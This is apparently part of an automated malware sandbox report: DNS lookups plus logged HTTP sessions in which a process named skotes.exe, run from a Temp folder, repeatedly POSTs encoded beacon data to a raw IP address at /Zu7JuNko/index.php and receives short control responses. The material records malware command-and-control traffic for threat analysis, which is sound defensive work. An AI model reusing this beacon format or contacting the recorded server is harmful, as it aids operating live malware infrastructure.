Nov 21, 2024 22:13:04.678967953 CET	1.1.1.1	192.168.2.5	0xe322	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 21, 2024 22:13:04.708657980 CET	1.1.1.1	192.168.2.5	0x4258	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:13:04.708657980 CET	1.1.1.1	192.168.2.5	0x4258	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:13:04.708810091 CET	1.1.1.1	192.168.2.5	0x5eb3	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 21, 2024 22:13:04.789491892 CET	1.1.1.1	192.168.2.5	0x9cc9	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:13:04.789491892 CET	1.1.1.1	192.168.2.5	0x9cc9	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:13:04.812963009 CET	1.1.1.1	192.168.2.5	0x1e7	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:13:07.773741007 CET	1.1.1.1	192.168.2.5	0x9901	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:13:07.774427891 CET	1.1.1.1	192.168.2.5	0x4685	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:14:47.681708097 CET	1.1.1.1	192.168.2.5	0x3be	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:14:47.682447910 CET	1.1.1.1	192.168.2.5	0x6c38	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:14:49.949799061 CET	1.1.1.1	192.168.2.5	0x6a47	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:14:49.950005054 CET	1.1.1.1	192.168.2.5	0x2ae1	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:14:50.297306061 CET	1.1.1.1	192.168.2.5	0x8043	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:14:50.298057079 CET	1.1.1.1	192.168.2.5	0xd067	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:14:50.471117020 CET	1.1.1.1	192.168.2.5	0xc1fb	No error (0)	sb.scorecardresearch.com		3.160.188.18	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:50.471117020 CET	1.1.1.1	192.168.2.5	0xc1fb	No error (0)	sb.scorecardresearch.com		3.160.188.19	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:50.471117020 CET	1.1.1.1	192.168.2.5	0xc1fb	No error (0)	sb.scorecardresearch.com		3.160.188.68	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:50.471117020 CET	1.1.1.1	192.168.2.5	0xc1fb	No error (0)	sb.scorecardresearch.com		3.160.188.50	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:50.517157078 CET	1.1.1.1	192.168.2.5	0xedea	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:14:50.517303944 CET	1.1.1.1	192.168.2.5	0x52c9	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:14:50.538228035 CET	1.1.1.1	192.168.2.5	0xeef	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:14:50.607620001 CET	1.1.1.1	192.168.2.5	0x8ddc	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:14:50.607620001 CET	1.1.1.1	192.168.2.5	0x8ddc	No error (0)	googlehosted.l.googleusercontent.com		142.250.181.65	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:50.612869024 CET	1.1.1.1	192.168.2.5	0x81ef	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:14:50.612916946 CET	1.1.1.1	192.168.2.5	0x9905	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:14:51.521653891 CET	1.1.1.1	192.168.2.5	0xec65	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:52.670985937 CET	1.1.1.1	192.168.2.5	0x56df	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:52.670985937 CET	1.1.1.1	192.168.2.5	0x56df	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:52.671003103 CET	1.1.1.1	192.168.2.5	0xece7	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:52.671003103 CET	1.1.1.1	192.168.2.5	0xece7	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:52.671098948 CET	1.1.1.1	192.168.2.5	0x32cb	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 21, 2024 22:14:52.672946930 CET	1.1.1.1	192.168.2.5	0xa1de	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 21, 2024 22:15:09.084690094 CET	1.1.1.1	192.168.2.5	0x2f5e	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:16:02.506975889 CET	1.1.1.1	192.168.2.5	0x16b0	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:16:02.507102013 CET	1.1.1.1	192.168.2.5	0x90d4	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:16:50.977380991 CET	1.1.1.1	192.168.2.5	0xc593	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:16:51.074420929 CET	1.1.1.1	192.168.2.5	0xb20	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:18:46.177486897 CET	1.1.1.1	192.168.2.5	0x6865	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:19:49.991110086 CET	1.1.1.1	192.168.2.5	0xe671	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 21, 2024 22:19:49.991256952 CET	1.1.1.1	192.168.2.5	0xeef6	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:19:49.991256952 CET	1.1.1.1	192.168.2.5	0xeef6	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:19:51.008224964 CET	1.1.1.1	192.168.2.5	0xc973	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:19:51.008286953 CET	1.1.1.1	192.168.2.5	0x63cd	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

thedotmediagroup.com

chrome.cloudflare-dns.com

api.edgeoffer.microsoft.com

clients2.googleusercontent.com

https:

assets.msn.com

c.msn.com

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

data-edge.smartscreen.microsoft.com

api.telegram.org

185.215.113.43

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49812	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:12:04.997021914 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:12:06.429641962 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:12:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49818	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:12:08.059417963 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:12:09.543158054 CET	287	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:12:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 31 0d 0a 20 3c 63 3e 31 30 30 38 30 32 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 64 30 63 30 66 39 63 33 34 65 31 62 66 65 39 64 31 31 32 34 36 31 31 36 32 61 66 34 35 32 66 63 63 61 64 65 62 32 66 62 62 63 62 37 63 34 37 32 64 64 35 32 34 64 62 33 35 32 66 30 30 32 34 31 35 34 35 30 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 61 <c>1008029001+++b5937c1ad0c0f9c34e1bfe9d112461162af452fccadeb2fbbcb7c472dd524db352f002415450#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49880	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:12:35.907192945 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 38 30 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008029001&unit=246122658369
Nov 21, 2024 22:12:37.300508022 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:12:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49889	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:12:39.184993029 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:12:40.557570934 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:12:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49899	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:12:42.198776960 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:12:43.534687996 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:12:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49906	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:12:45.276751995 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:12:46.711678028 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:12:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49914	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:12:48.351548910 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:12:49.727015018 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:12:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49922	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:12:51.495536089 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:12:52.919346094 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:12:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49930	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:12:54.543281078 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:12:55.924493074 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:12:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49950	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:12:57.920293093 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:12:59.344305992 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:12:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49963	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:01.020077944 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49987	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:06.775394917 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:13:08.205435991 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	50010	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:09.834914923 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:13:11.215605021 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	50033	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:12.971307993 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:13:14.410876036 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	50046	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:16.047354937 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:13:17.390492916 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	50053	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:19.133815050 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:13:20.571755886 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	50059	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:22.216917038 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: 